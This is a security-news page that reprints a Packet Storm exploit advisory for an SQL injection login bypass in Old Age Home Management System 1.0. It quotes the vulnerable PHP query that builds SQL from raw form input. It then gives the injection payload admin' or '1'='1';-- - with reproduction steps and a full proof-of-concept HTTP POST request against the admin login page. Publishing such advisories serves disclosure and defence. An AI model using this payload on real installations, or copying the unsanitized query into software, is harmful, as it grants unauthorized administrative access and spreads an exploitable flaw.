Security
Headlines
HeadlinesLatestCVEs

Headline

Old Age Home Management System 1.0 SQL Injection

Old Age Home Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Packet Storm
#sql#vulnerability#web#linux#php#auth#firefox
# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass# Date: 12/06/2022# Exploit Author: twseptian# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip# Version: v1.0# Tested on: Kali Linux# Vulnerable codeline 9 in file "/oahms/admin/login.php"$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");# Steps of reproduce:1. Go to the admin login page http://localhost/oahms/admin/login.php2. sqli payload:  admin' or '1'='1';-- -3. password: password# Proof of ConceptPOST /oahms/admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 71Origin: http://localhostConnection: closeReferer: http://localhost/oahms/admin/login.phpCookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution